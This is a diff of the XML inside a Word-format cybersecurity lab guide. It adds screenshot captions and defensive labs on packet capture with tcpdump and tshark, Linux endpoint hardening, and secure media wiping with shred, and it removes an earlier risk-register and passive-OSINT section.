+                    <a:blip r:embed="rId38"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5120640" cy="2734887"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect"/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="555B66"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>Lab 26 — expected terminal output on the Killercoda playground</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -6545,6 +9680,58 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+            <wp:extent cx="5120640" cy="2734887"/>
+            <wp:docPr id="31" name="Picture 31"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic>
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic>
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="lab-27.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId39"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5120640" cy="2734887"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect"/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="555B66"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>Lab 27 — expected terminal output on the Killercoda playground</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -6745,6 +9932,58 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+            <wp:extent cx="5120640" cy="2734887"/>
+            <wp:docPr id="32" name="Picture 32"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic>
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic>
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="lab-28.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId40"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5120640" cy="2734887"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect"/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="555B66"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>Lab 28 — expected terminal output on the Killercoda playground</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -6993,6 +10232,58 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+            <wp:extent cx="5120640" cy="2734887"/>
+            <wp:docPr id="33" name="Picture 33"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic>
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic>
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="lab-29.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId41"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5120640" cy="2734887"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect"/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="555B66"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>Lab 29 — expected terminal output on the Killercoda playground</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -7273,6 +10564,58 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+            <wp:extent cx="5120640" cy="2734887"/>
+            <wp:docPr id="34" name="Picture 34"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic>
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic>
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="lab-30.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId42"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5120640" cy="2734887"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect"/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="555B66"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>Lab 30 — expected terminal output on the Killercoda playground</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -7290,15 +10633,20 @@
     <w:p/>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Domain 05 — Security Program Management &amp; Oversight  (20%)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Risk &amp; CVSS · OSINT · Nmap · Pentesting · Compliance · Awareness</w:t>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Lab 40 — Packet Capture &amp; Traffic Analysis</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Exam objective: Capture and analyse network traffic for indicators.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Goal: The learner captures live traffic with tcpdump, saves a PCAP, and analyses it for suspicious flows — the same skill a SOC analyst uses to confirm an alert.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7308,57 +10656,12 @@
           <w:color w:val="1F6FEB"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>Key concepts</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Risk management records threats in a register, scores them (CVSS, likelihood × impact) and drives treatment decisions.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Reconnaissance — passive OSINT and active scanning with Nmap — maps an organisation's exposure the way an attacker would.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Penetration testing safely validates exploitability; every engagement needs authorisation and Rules of Engagement.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Governance proves control effectiveness through compliance auditing (OpenSCAP/CIS) and measurable security-awareness testing.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Lab 31 — Risk Register, CVSS Scoring, and Quantitative Risk</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Exam objective: Build a risk register and score with CVSS.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Goal: Build a CSV risk register, score findings with CVSS v3.1, and calculate ALE to justify control spend.</w:t>
+        <w:t>What you'll build</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>A saved PCAP plus a filtered analysis showing the target flow and any cleartext credentials.   (Tools: tcpdump, tshark, curl.)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7368,12 +10671,115 @@
           <w:color w:val="1F6FEB"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>What you'll build</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>CSV risk register with CVSS and ALE math   (Tools: python3, FIRST.org CVSS calculator, column, bash.)</w:t>
+        <w:t>Step-by-step</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Install the capture tools</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="0B3060"/>
+          <w:sz w:val="19"/>
+        </w:rPr>
+        <w:t>apt install -y tcpdump tshark</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Capture traffic to a PCAP file</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="0B3060"/>
+          <w:sz w:val="19"/>
+        </w:rPr>
+        <w:t>tcpdump -i any -w /tmp/cap.pcap -c 50 &amp;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Generate some HTTP traffic</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="0B3060"/>
+          <w:sz w:val="19"/>
+        </w:rPr>
+        <w:t>curl -s http://example.com &gt; /dev/null</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>List conversations in the capture</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="0B3060"/>
+          <w:sz w:val="19"/>
+        </w:rPr>
+        <w:t>tshark -r /tmp/cap.pcap -q -z conv,ip | head</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Filter for a suspicious port / plaintext</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="0B3060"/>
+          <w:sz w:val="19"/>
+        </w:rPr>
+        <w:t>tshark -r /tmp/cap.pcap -Y 'http.request' -T fields -e ip.dst -e http.host | head</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Upload the PCAP to the browser PCAP Analyzer</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="0B3060"/>
+          <w:sz w:val="19"/>
+        </w:rPr>
+        <w:t>echo "Open https://alfredang.github.io/pcapanalyzer/ and load /tmp/cap.pcap"</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7383,6 +10789,122 @@
           <w:color w:val="1F6FEB"/>
           <w:sz w:val="22"/>
         </w:rPr>
+        <w:t>Test it</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>The PCAP is written and tshark lists the IP conversations and the HTTP requests it contains.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+            <wp:extent cx="5120640" cy="2734887"/>
+            <wp:docPr id="35" name="Picture 35"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic>
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic>
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="lab-40.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId43"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5120640" cy="2734887"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect"/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="555B66"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>Lab 40 — expected terminal output on the Killercoda playground</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="1F6FEB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Note: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>Full step-by-step commands and references are in labs/lab-40-*.md. Reset the Killercoda playground before the next stateful lab.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Lab 41 — Mobile &amp; Endpoint Hardening Baseline</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Exam objective: Apply and verify an endpoint hardening baseline.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Goal: The learner applies a hardening baseline to a Linux endpoint (the stand-in for a managed mobile/endpoint), disabling weak services and enforcing policy, then verifies it.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="1F6FEB"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>What you'll build</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>A hardened host with password policy, disabled root SSH, and a screen-lock/idle-timeout policy — verified against a checklist.   (Tools: sshd_config, login.defs, pam, systemctl.)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="1F6FEB"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
         <w:t>Step-by-step</w:t>
       </w:r>
     </w:p>
@@ -7391,7 +10913,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Create and view the CSV risk register</w:t>
+        <w:t>Enforce a minimum password age/length policy</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7401,7 +10923,7 @@
           <w:color w:val="0B3060"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>column -t -s, risk-register.csv</w:t>
+        <w:t>sed -i "s/^PASS_MIN_LEN.*/PASS_MIN_LEN 12/" /etc/login.defs 2&gt;/dev/null; grep PASS_ /etc/login.defs</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7409,7 +10931,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Score R-001 on the FIRST.org CVSS v3.1 calculator</w:t>
+        <w:t>Disable direct root SSH login</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7419,7 +10941,7 @@
           <w:color w:val="0B3060"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>https://www.first.org/cvss/calculator/3.1</w:t>
+        <w:t>sed -i "s/^#*PermitRootLogin.*/PermitRootLogin no/" /etc/ssh/sshd_config</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7427,7 +10949,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Compute SLE and ALE in Python</w:t>
+        <w:t>Set an idle session timeout</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7437,7 +10959,7 @@
           <w:color w:val="0B3060"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>python3 -c "print(200000*0.6*0.5)"</w:t>
+        <w:t>echo "TMOUT=600; readonly TMOUT" &gt; /etc/profile.d/timeout.sh</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7445,15 +10967,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Choose a risk treatment (mitigate vs accept)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListNumber"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Add Key Risk Indicators to a CSV</w:t>
+        <w:t>Disable an unneeded service</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7463,7 +10977,7 @@
           <w:color w:val="0B3060"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>column -t -s, kri.csv</w:t>
+        <w:t>systemctl disable --now avahi-daemon 2&gt;/dev/null; echo done</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7471,7 +10985,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Generate the one-page board risk report</w:t>
+        <w:t>Verify the baseline against a checklist</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7481,7 +10995,7 @@
           <w:color w:val="0B3060"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>cat board-report.md</w:t>
+        <w:t>grep PermitRootLogin /etc/ssh/sshd_config &amp;&amp; cat /etc/profile.d/timeout.sh</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7496,7 +11010,59 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>The Python output shows ALE 60,000/year and board-report.md lists 4 open risks.</w:t>
+        <w:t>Root SSH login is disabled, the password policy is set, and the idle-timeout policy is present.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+            <wp:extent cx="5120640" cy="2734887"/>
+            <wp:docPr id="36" name="Picture 36"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic>
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic>
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="lab-41.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId44"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5120640" cy="2734887"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect"/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="555B66"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>Lab 41 — expected terminal output on the Killercoda playground</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7511,7 +11077,7 @@
         <w:rPr>
           <w:sz w:val="20"/>
         </w:rPr>
-        <w:t>Full step-by-step commands and references are in labs/lab-31-*.md. Reset the Killercoda playground before the next stateful lab.</w:t>
+        <w:t>Full step-by-step commands and references are in labs/lab-41-*.md. Reset the Killercoda playground before the next stateful lab.</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -7520,17 +11086,17 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:t>Lab 32 — Passive Reconnaissance / OSINT</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Exam objective: Collect a domain footprint using only passive tools.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Goal: Gather a domain's public footprint with passive OSINT tools that never send packets to the target.</w:t>
+        <w:t>Lab 42 — Secure Data Sanitisation (Media Disposal)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Exam objective: Securely wipe media and verify destruction.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Goal: The learner writes sensitive data to a virtual disk, then securely sanitises it and verifies the data is unrecoverable — the disposal stage of the asset lifecycle.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7545,7 +11111,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Passive recon report of an authorised domain   (Tools: whois, dnsutils, theHarvester, subfinder, jq, crt.sh.)</w:t>
+        <w:t>A wiped virtual disk whose sensitive string is no longer recoverable, with before/after evidence.   (Tools: dd, shred, grep, strings.)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7563,7 +11129,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Install theHarvester and subfinder</w:t>
+        <w:t>Create a virtual disk with secret data</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7573,7 +11139,7 @@
           <w:color w:val="0B3060"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>pip3 install --break-system-packages git+https://github.com/laramies/theHarvester.git</w:t>
+        <w:t>dd if=/dev/zero of=/disk.img bs=1M count=50 &amp;&amp; echo "TOP-SECRET-DATA" &gt;&gt; /disk.img</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7581,7 +11147,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Set the authorised target domain</w:t>
+        <w:t>Confirm the secret is present</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7591,7 +11157,7 @@
           <w:color w:val="0B3060"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>TARGET=example.com</w:t>
+        <w:t>strings /disk.img | grep TOP-SECRET &amp;&amp; echo FOUND</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7599,7 +11165,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Query WHOIS registrant and dates</w:t>
+        <w:t>Securely overwrite the media</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7609,7 +11175,7 @@
           <w:color w:val="0B3060"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>whois $TARGET | grep -Ei "registrar|registrant|expiry|name server" | head</w:t>
+        <w:t>shred -v -n 3 -z /disk.img</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7617,7 +11183,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Enumerate DNS records (MX, TXT, NS)</w:t>
+        <w:t>Confirm the secret is gone</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7627,7 +11193,7 @@
           <w:color w:val="0B3060"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>dig +short MX $TARGET</w:t>
+        <w:t>strings /disk.img | grep TOP-SECRET || echo "SANITISED — not recoverable"</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7635,7 +11201,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Discover subdomains passively with subfinder</w:t>
+        <w:t>Note the method for the disposal record</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7645,7 +11211,133 @@
           <w:color w:val="0B3060"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>subfinder -silent -d $TARGET | tee subs.txt</w:t>
+        <w:t>echo "Method: 3-pass overwrite + zero (NIST 800-88 clear)"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="1F6FEB"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>Test it</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>The secret string is found before shred and is absent after — sanitisation is verified.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+            <wp:extent cx="5120640" cy="2734887"/>
+            <wp:docPr id="37" name="Picture 37"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic>
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic>
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="lab-42.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId45"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5120640" cy="2734887"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect"/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="555B66"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>Lab 42 — expected terminal output on the Killercoda playground</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="1F6FEB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Note: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+        </w:rPr>
